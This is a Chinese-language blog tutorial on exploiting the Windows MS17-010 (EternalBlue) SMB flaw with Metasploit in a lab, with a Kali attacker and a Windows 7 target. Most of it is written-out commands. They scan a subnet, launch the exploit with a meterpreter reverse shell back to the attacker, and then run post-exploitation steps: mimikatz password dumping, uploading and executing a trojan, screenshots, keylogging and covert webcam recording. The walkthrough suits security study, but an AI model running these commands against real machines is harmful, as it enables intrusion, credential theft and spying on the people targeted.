Windows MS17-010漏洞利用介绍

利用metasploit开源安全漏洞检测工具实现漏洞检测及利用

1、metasploit介绍

------Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
------Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。(摘录自百度百科)

2、MS17-010漏洞介绍

------MS17-010是一个安全类型的补丁,用来修补Windows操作系统中存在的一个基于SMB服务展现出来的一个漏洞,此漏洞利用445端口执行,原本是作为局域网共享使用的一个端口,但恶意人员可以利用此端口偷偷的执行共享服务或者其他命令执行操作。此MS17-0101漏洞主要是针对于Windows7及以前的操作系统暴露出来的安全问题。

3、环境介绍

kali:作为执行漏洞利用的主机,默认上面安装了metasploit安全漏洞检测工具,IP为192.168.85.215。
windows7:作为靶机使用,模拟被攻击者,IP为192.168.85.146

5、漏洞利用流程介绍
  1. 在kali当中启动metasploit工具,通过msfconsole指令进行启动。
    在这里插入图片描述
  2. Search命令搜索ms17-010漏洞扫描模块,图中圈中的就是漏洞扫描模块。
    执行:
    search ms17-010 //搜索ms17-010相关漏洞利用模块
    在这里插入图片描述
  3. msf > use auxiliary/scanner/smb/smb_ms17_010 (利用模块该扫描模块并且设置相关扫描范围信息)。
    执行:
    use auxiliary/scanner/smb/smb_ms17_010 //选择使用该模块执行搜索选项
    set rhosts 192.168.85.0/24 //设置扫描的网段范围
    set threads 20 //设置扫描的线程,数值越大扫描速度越快
    run //开始运行即开始执行扫描
    在这里插入图片描述
  4. 执行扫描过后,结果如下所示,从结果中可以看到在当前扫描的网段中存在一个windows 7版本的操作系统存在ms17-010漏洞。
    在这里插入图片描述
  5. 接下来进行漏洞利用过程即可,执行:
    use exploit/windows/smb/ms17_010_eternalblue //选择漏洞利用模块
    set payload windows/x64/meterpreter/reverse_tcp //设置漏洞利用完成后的反弹模块,用以接收回馈信息
    set lhost 192.168.85.215 //设置反弹IP地址
    set lport 5555 //设置反弹端口
    set rhost 192.168.85.146 //设置被攻击的目标主机
    在这里插入图片描述
  6. show options //检查设定的信息
    在这里插入图片描述
  7. exploit //开始进行漏洞利用
    在这里插入图片描述
    到这里即显示漏洞利用已成功。
    查看IP地址、查看进程信息。
    在这里插入图片描述
    在这里插入图片描述
6、执行操作
  1. 获取密码,执行:
    load mimikatz //加载获取密码的模块
    msv //利用mimikatz的msv获取密文hash
    Kerberos //获取明文密码zhang
    在这里插入图片描述
  2. 上传文件
    在kali根目录下创建了一个test.txt的文件,将其上传至目标操作系统当中C盘下。
    upload /test.txt c://
    上传木马文件也是同样的道理。
    在这里插入图片描述
    execute -f test.txt //执行该文件,如是木马文件即可成功执行并触发
    在这里插入图片描述
  3. 截取目标屏幕快照
    screenshot
    可以看到图片以及在root目录下面,直接下载查看
    在这里插入图片描述
  4. 键盘记录
    run post/windows/capture/keylog_recorder //运行键盘记录器,用户打开记事本开始写文本,得到结果
    在这里插入图片描述
  5. 跳用目标系统摄像头
    webcam_list //查看目标摄像头设备列表
    webcam_chat //开启摄像头录像
    webcam_snap //开启摄像头拍照
    webcam_stream //开启摄像头直播
    在这里插入图片描述
    --------------------------------------------武汉艾迪时代IT教育-----------------------------------------------------
发布了24 篇原创文章 · 获赞 20 · 访问量 3769

猜你喜欢

转载自blog.csdn.net/Dreamsi_zhang/article/details/105444279